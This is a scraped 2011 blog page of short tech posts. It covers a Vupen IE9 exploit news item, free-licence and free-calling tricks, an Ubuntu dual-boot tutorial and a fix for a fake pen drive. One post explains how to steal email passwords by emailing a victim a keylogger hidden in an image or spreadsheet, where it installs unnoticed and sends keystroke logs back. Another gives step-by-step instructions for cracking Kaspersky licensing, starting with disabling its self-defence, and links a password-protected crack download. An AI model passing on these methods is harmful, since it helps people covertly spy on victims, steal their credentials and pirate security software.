Vupen's exploit code is only effective on IE9, which can run on Windows 7 and predecessor Windows Vista. IE9 has recently been released and is not yet being distributed through Windows Update. Microsoft will start that rollout in the coming weeks. An exact date for the wider distribution and installation of the latest Windows browser has not been disclosed.

IE9 currently has a market share of 3.6 percent amongst Windows 7 users, according to figures from market researcher NetApplications. Windows 7 itself has a global market share of nearly 25 percent. Windows XP still has a larger installed base.

Measured across all PC users IE9 has a market share of only 1.04 percent, reports NetApplications. Competitor StatCounter doesn't even show IE9 as a separate browser in its market share overview, but puts it in the category "other."

by Rishikesh · 0

Saturday, April 9, 2011

Xclusive All NetWorK Free CalliNg TricK

All_NetWorK_FreE_CalliNg_TricK 
1-Just Go To
2-Select Your Country and input Your Phone Number in box. 
3-Select Your Friends Country and input his/her Phone Number in the box. 
4-Now Click on "Submit" 
5-After click on " Submit " button That site will be give you a Mobile Number. Just missed call on that number. you will not charge for missed call. 
6-Now wait for about 5 Seconds...You will get a Call just Recieved that call and Talk To Your friend 25minuts 100% free. 


Tips: You can repeat this method to make more Calls to Other's friend's Number or Same Number.

Saturday, April 9, 2011 by Rishikesh · 0

Friday, April 8, 2011

Get Panda Internet Security 2011

Antivirus Pro 2011 absolutely Free for 6 months (180 days). 
Panda Antivirus Pro 2011 offers the most intuitive protection easy to use for your computer. Install it and forget about viruses, spyware, rootkits, hackers and online fraud. Chat, share photos and videos, buy online, read your favorite blogs or simply surf the Web with confidence and without interruption. 

Panda Internet Security 2011 is a security suite you can use the Internet for everything. It protects you from viruses, hackers, online fraud, identity theft and other known threats unknown. Keeps your inbox free of spam and you lets you browse privately and securely with the new Panda Safe Browser. 

To grab a free license, you don’t need to register or fill any complicated forms. Just visit the promo page, click the ‘DESCARGAR GRATIS’ button and download the OEM installer. Install it and activate the product (license key is integrated). It has option for two languages – English and Spanish. Enjoy!

Friday, April 8, 2011 by Rishikesh · 0

Wednesday, April 6, 2011

install Ubuntu[TUT]

Recently I installed Ubuntu [Linux] as a dual boot OS with Seven already installed on my Machine. I faced a lot of problems, but the end result was worth all the trouble as Ubuntu rocks 

In this thread I will post the step by step method to install Ubuntu (or any of its other versions such as Mint) as a dual boot OS on Seven machine. I will also specify some mistakes I made and what I learned outta those. 
The first step to install Ubuntu was to creat a partition on my existing hard drive. There are two ways how you can do it in Seven:

1. In built 'Shrink Disc' feature in Seven
2. Use a disk partition software to do it for you.

Ubuntu or Mint comes with an inbuilt disk partitioner. What is required is a unallocated free space on your hard drive so that it can be partitioned while installing Ubuntu.

1. Making Space using "Shrink Disc" feature in Seven:
a. Log on to Seven.
b. Right-Click on "My computer" in the main menu and select "Manage"
c. It will ask for administrator password, enter it and click "allow"
d. Click on Disc Management.
e. There is will show the available partitions and external storage devices if any
f. Right Click on the disc partition you want to shrink and select "shrink volume"
g. Seven will assess how much space can be made free.
h. It will suggest the value which can be made free. Be sure that this is at least 10-15 GB. If you dont have this space, you will have to delete some data to make space for the partition.
i. Then select "shrink"
j. Seven will shrink the volume and show the new freed space as "unallocated" space.
k. After this close the window. You are done with shrinking
2. Making Space using a Disk Partition software:
a. I had problem that Seven used to say "access denied" when I tried to shrink the main C: Drive (I had only on partition )
b. So I used a Free Disk Partition Software to shrink the space.
c. You can use the following software: EasyUS partition Master-Home Edition which you can download here:
d. Using this it is easy to create space for a new partition.
e. Using the above program, select the partition you want to shrink/resize
f. Using the "Resize" tool you can shrink the volume and the rest of the space would be shown as "unallocated space"
g. Apply the changes and you are done

The next step is to install Ubuntu

1. You will need to download the latest ISO for Ubuntu or Mint from here:

2. You will need to burn this ISO image on to a CD (700 MB or more).
3. For burning this ISO you will have to use an ISO burning software. One such free software is: Free ISO burner:
4. Be sure to burn the ISO image at a very slow speed. This extra time spent will help you install Linux trouble-free.
5. When the disc is ready, restart the computer. Be sure that in BIOS setup the CD drive is above the hard disc in boot priority.
6. Once restarted the disc will boot before the hard disc.
7. In the menu that is displayed, select "run installer" and follow the instructions.
8. Once you have selected language, Location and Keyboard configuration....the disk partitioner of ubuntu will run and show you various options as to where Ubuntu should be installed.
9. Select "Largest continuous free space" as this will select the "unallocated space" that we have created in the earlier step.
10. After this follow the next instructions to complete the installation.
11. The installation will prompt you to import the settings from Seven. If you want do import these.
12. I preferred not to import as it will copy the documents from Seven partition to the new partition of Ubuntu and just eat up the partition space. You can always access the Seven documents from Ubuntu as Seven partion will be shown as a hard disk in "My computer".
13. Complete the installation. It will prompt to restart the computer. Do so.
14. After restart, the menu will show Ubuntu and Seven a dual boot OS and now you are free to choose the OS you want to load

Wednesday, April 6, 2011 by Rishikesh · 0

Sunday, April 3, 2011

[HOT] Kaspersky antiBl@cklist patch working 2011, 2010

Download trial version from here http://www.kaspersky.com/
Crack Kaspersky Internet Security and Kaspersky Antivirus for 35 years. Working on 2010 and 2009 Kaspersky version...

Introduce the basic features of the crack: - Button IT Crack: Crack Kaspersky is divided into two types of machines if you install Kaspersky 7.8 (2009) and, after the crack Kaspersky Pure will be able to load the keys are locked into spending impartial. If you installed Kaspersky 9 (2010) and Kaspersky Pure will be adding a feature other than the above features that help you to insert the key has expired on and is limited to reuse in 2035. Besides, it also integrates crack always unlock feature allows you to load the key file directly after without having to crack the network disconnect. See the instructions in the tutorial crack below (note there are two 

instructions for two versions) - Button Unlock: This is not just a crack, but more active in feature key file without interrupting the network only (Apply for KAV / KIS 9 (2010) and Pure Kaspersky) - Button Restore: allows to recover the original state before crack 

Guide for version 7.8 crack Kaspersky (2009): 1. Options on the Kaspersky settings, turn off the check in the Enable Self-Defense as the following for each version:
2. Click the icon under the Kaspersky always exit tray selection
3. Download the crack in the link below on machine
4. Turn then crack up Crack IT press (Note if a key was not loaded was then re offline)
5. Click on the Activate New License of Kaspersky license or commercial license and select
6. Over the next step you will see the key file loaded, you can load the key file in the Keys folder on the downloaded file. 
Depending on where you load KIS or KAV key for the correct version. You can load any lock key you were here to enable comfortable Kas 7. If after that crack is not loaded please crack key from step 2
8. Update indifferent to the expiration of the key used 

Instructions for crack kaspersky version 9 (2010):
1. Options on the Kaspersky settings, turn off the check in the Enable Self-Defense as crack Kaspersky Guide for version 7.8 (2009)
2. Click the icon under the Kaspersky always exit tray selection
3. Download the crack in the link below on machine
4. Turn then crack up Crack IT press (Note if a key was not loaded was then re offline)
5. Click on the Activate New License of Kaspersky license or commercial license and select Activate as crack Kaspersky Guide
for version 7.8 (2009)
6. Over the next step you will see the key file loaded, you can load the key file in the directory KeysExpired downloaded file.
Depending on where you load KIS or KAV key for the correct version.
7. If after that crack is not loaded please crack key from step 2
8. Update indifferent to the expiration of the key used

Versions supported:
KAV / KIS 7.8 (2009), 9 (2010), Pure
OS support:
Windows XP, 2003, Windows Vista, Windows 7
tutorial included in file
download
Password - tushar


Sunday, April 3, 2011 by Rishikesh · 0

Avast Internet Security 5.0.677 with License Key

=> What's new in this version:
Version 5.0.677.100921 solves a problem that could lead to disappearing of the avast service.

How to Insert License File:
1. Open avast
2. Go to "Maintenance"
3. Click "Subscription"
4. Click "Insert License File"
5. Insert 1st License File and it'll be demo now
6. Now Insert 2nd License File and it'll be activated for 2013.
7. Enjoy Avast Internet Security 5.0.67 till 2013

by Rishikesh · 0

Email Hacking Software - Comprehensive Article

Password Hacking Software, Email Hacking Software, Yahoo Password Hacking Software, Hotmail Password Hacking Software… 

Don’t get fooled by these words. Learn the Real of of hacking email passwords. Identify which Hacking Softwares work and which doesn’t. Most of us are very curious about a software that can hack email passwords. In fact most of the searches about hacking contain the keyword email hacking software or password hacking software. But is it really possible to hack an email using a software? Does there exist a software to hack email passwords? In this post I’ll explain every possible information that you need to know about an email hacking software.

Email Hacking Software – Explained
THINGS YOU SHOULD KNOW BEFORE PROCEEDING
Many sites on the internet claim to sell softwares/programs to hack email passwords. I know most of you are aware of this. These sites also boast that their software can hack email passwords with in minutes. Some sites also claim that they can hack any one’s password for money (say $100). Never believe these sites. They are all scam! I can dare challenge anyone who claims to hack an email, using a software program. In fact when I was a newbie in the field of Hacking, I have spent many sleepless nights in search of an Email hacking software. Finally I ended up only with frustration and nothing more than that. I don’t want my readers to commit the same mistake which I did. So, never believe those scam sites and empty your pockets by spending on useless softwares. 

SO, HOW CAN I HACK AN EMAIL PASSWORD ? The story doesn’t end up here. It is still possible to hack an email password and several opportunities to do that are still open for you. In this post I’ll discuss the easiest way to hack an email password. For this you need not be an expert hacker or have any knowledge of hacking. Yes believe me, it’s possible. All you have to do is just use Keyloggers. Here are some of the Frequently Asked Questions about keyloggers.

What is a keylogger ? A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. Keylogger is the easiest way to hack an email account. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password. Even though keylogger software is not meant for hacking passwords, you can use them to hack email passwords. 

Where is the keylogger program available ?
A keylogger program is widely available on the internet. The of the best one is given below

SniperSpy
Sniperspy can be used either on a Local or Remote computer.

I don’t have physical access to the victim’s computer, can I still hack the password ?
Yes, you can still hack the email using a keylogger software. All you have to do is, just use a keylogger software that has Remote Installation feature. SniperSpy support Remote Installation. You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the program containing, it will automatically get installed without his knowledge and start recording every activity on his computer. These activities are sent to you by the keylogger software via email or FTP. Why Sniperspy is the best ?
These are some of the advantages of SniperSpy over any other software.
1. Sniper Spy is more reliable than any other keylogger since the logs sent will be received and hosted by SniperSpy servers. You need not rely on your email account to receive the logs.
2. SniperSpy offers excellent support.
3. SniperSpy has got recognition from media such as CNN, BBC, CBS, Digit etc. Hence it is more reputed and trustworthy.

by Rishikesh · 0

Friday, April 1, 2011

Want to Fix your Kingston 32 GB Fake Chinese Pen Drive

Windows thinks "32 GB Kingston" USB Pen drive has 32 GB of memory, and lets you format only to this maximum value it thinks is correct. However when I write more than 1 GB onto mine, the file names get nonsense,the content corrupt. (+-+-+-+-+-+-+) 

So it has actually only about 1 GB of memory the rest is cheating! Download "mkdosfs"
click here
which allows you to specify a number of blocks to format on the drive. 
unzip the compressed file. Run mkdosfs.Silent.exe Suppose my pen drive is I:, so I typed on a Windows cmd prompt: MKDOSFS -F 32 I: 2060000
it formats the drive in FAT32, with 2060000 blocks of 512K (which gives you 0.97 GB / 993.28 MB). 

I checked by filling up completely the newly formatted drive with files that all files are written correctly. 

After running this command, you should also check by yourself that files are correct until the drive is completely full, since your Pen Drive may have even less memory inside.

Friday, April 1, 2011 by Rishikesh · 1

All Rights Reserved GprsBay | Blogger Template by Bloggermint